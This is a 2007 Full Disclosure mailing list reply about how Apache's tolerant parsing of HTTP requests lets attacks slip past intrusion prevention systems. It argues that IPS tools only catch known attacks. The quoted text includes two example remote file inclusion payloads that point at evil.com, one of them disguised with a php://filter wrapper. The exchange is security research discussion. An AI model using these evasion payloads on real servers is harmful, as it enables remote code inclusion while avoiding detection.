Full Disclosure mailing list archives
Re: IPS Evasion with the Apache HTTP Server
From: 3APA3A <3APA3A () SECURITY NNOV RU>
Date: Wed, 20 Jun 2007 17:50:55 +0400
Dear Jamie Riden, --Wednesday, June 20, 2007, 4:39:21 PM, you wrote to 3APA3A () security nnov ru: JR> (This is what I gathered from the original posting, but I might be wrong.) JR> I think the issue is not that the apache server behaviour is wrong as JR> such, Original BreakingPoint articles author refers to says "The intent is describe the strange behaviors of network applications". It mentions neither of IPS products, but IIS and Apache. And at least one case of Apache behavior is partially expected (because of RFC) and already described (by Michal Majchrowicz). JR> but that IDS/IPS do not use the same algorithm as apache for JR> checking validity of HTTP requests. Thus apache may accept and process JR> a request like: JR> \r\n\r\n\r\n\r\n\r\n\x0c/rfi.php?includedir=http://evil.com\x0bHTTP/1.0\r\n\r\n IPS may detect known attacks. Just like antivirus, you may use IPS to protected against known viruses/exploits. An ability to bypass IPS with new one is not a bug. I do collect different content filtering bypassing methods: http://securityvulns.com/advisories/content.asp You simply MUST accept the risk there is always the way to bypass content filtering. IPS like doesn't protect your network by itself. IPS is nothing, but a tool. JR> but that the IDS/IPS will ignore that packet on the grounds that "it's JR> not a valid HTTP request"., when it should actually be alerting that a JR> RFI attempt was made. In this situation IDS/IPS should alert unsupported request attempt was made and block this attempt in case of IPS. JR> While we're on the subject of IDS, it looks like PHP 5 supports a new JR> wrapper php://filter, such that a RFI may be performed by: GET JR> /rfi.php?includedir=php://filter/resource=http://www.evil.com - which JR> may not be detected by some existing IDS signatures. (See JR> http://uk2.php.net/manual/en/wrappers.php.php ) I can write buggy application and attempt to exploit it will never be detected by existing signatures. -- ~/ZARAZA http://securityvulns.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- IPS Evasion with the Apache HTTP Server H D Moore (Jun 19)
- Re: IPS Evasion with the Apache HTTP Server coderman (Jun 19)
- Re: IPS Evasion with the Apache HTTP Server Valdis . Kletnieks (Jun 19)
- Re: IPS Evasion with the Apache HTTP Server coderman (Jun 19)
- Re: IPS Evasion with the Apache HTTP Server Valdis . Kletnieks (Jun 19)
- Re: IPS Evasion with the Apache HTTP Server 3APA3A (Jun 20)
- Re: IPS Evasion with the Apache HTTP Server Jamie Riden (Jun 20)
- Re: IPS Evasion with the Apache HTTP Server 3APA3A (Jun 20)
- Re: IPS Evasion with the Apache HTTP Server H D Moore (Jun 20)
- Re: IPS Evasion with the Apache HTTP Server H D Moore (Jun 20)
- Re: IPS Evasion with the Apache HTTP Server Jamie Riden (Jun 20)
- Re: IPS Evasion with the Apache HTTP Server coderman (Jun 19)